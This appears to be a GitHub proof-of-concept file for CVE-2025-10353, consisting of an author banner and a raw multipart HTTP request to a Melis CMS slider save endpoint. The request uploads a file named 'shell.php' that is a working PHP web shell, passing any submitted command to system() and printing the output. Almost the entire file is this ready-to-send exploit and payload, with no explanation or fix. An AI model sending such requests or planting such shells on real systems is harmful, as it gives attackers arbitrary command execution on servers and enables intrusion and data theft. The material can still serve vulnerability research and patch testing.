CVE-2025-10353-POC/CVE-2025-10353-POC.txt at main · ivansmc00/CVE-2025-10353-POC · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
#===========================================================================================#
#          _______      ________    ___   ___ ___  _____      __  ___ ____  _____ ____      #
#         / ____\ \    / /  ____|  |__ \ / _ \__ \| ____|    /_ |/ _ \___ \| ____|___ \     #
#        | |     \ \  / /| |__ ______ ) | | | | ) | |__ ______| | | | |__) | |__   __) |    #
#        | |      \ \/ / |  __|______/ /| | | |/ /|___ \______| | | | |__ <|___ \ |__ <     #
#        | |____   \  /  | |____    / /_| |_| / /_ ___) |     | | |_| |__) |___) |___) |    #
#         \_____|   \/   |______|  |____|\___/____|____/      |_|\___/____/|____/|____/     #                                                                                                                                                                  #
#                                                                                           #
#                                                                                           #
#      Made with love for the hacking community <3         Manuel Iván San Martín Castillo  #
#===========================================================================================#

POST /melis/MelisCmsSlider/MelisCmsSliderDetails/saveDetailsForm HTTP/2
Host: vulnerable-host.com
Content-Type: multipart/form-data; boundary=---------------------------15193371471082653502937034547
Content-Length: 1664

-----------------------------15193371471082653502937034547
Content-Disposition: form-data; name="mcsdetail_title"


-----------------------------15193371471082653502937034547
Content-Disposition: form-data; name="mcsdetail_sub1"


-----------------------------15193371471082653502937034547
Content-Disposition: form-data; name="mcsdetail_sub2"


-----------------------------15193371471082653502937034547
Content-Disposition: form-data; name="mcsdetail_sub3"


-----------------------------15193371471082653502937034547
Content-Disposition: form-data; name="mcsdetail_link"


-----------------------------15193371471082653502937034547
Content-Disposition: form-data; name="mcsdetail_img"; filename="shell.php"
Content-Type: application/x-php

<html>
<body>
<form method="POST" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_POST['cmd']))
    {
        system($_POST['cmd'] . ' 2>&1');
    }
?>
</pre>
</body>
</html>

-----------------------------15193371471082653502937034547
Content-Disposition: form-data; name="mcsdetail_id"


-----------------------------15193371471082653502937034547
Content-Disposition: form-data; name="mcsdetail_mcslider_id"

0
-----------------------------15193371471082653502937034547
Content-Disposition: form-data; name="mcsdetail_order"


-----------------------------15193371471082653502937034547
Content-Disposition: form-data; name="mcsdetail_status"

0
-----------------------------15193371471082653502937034547--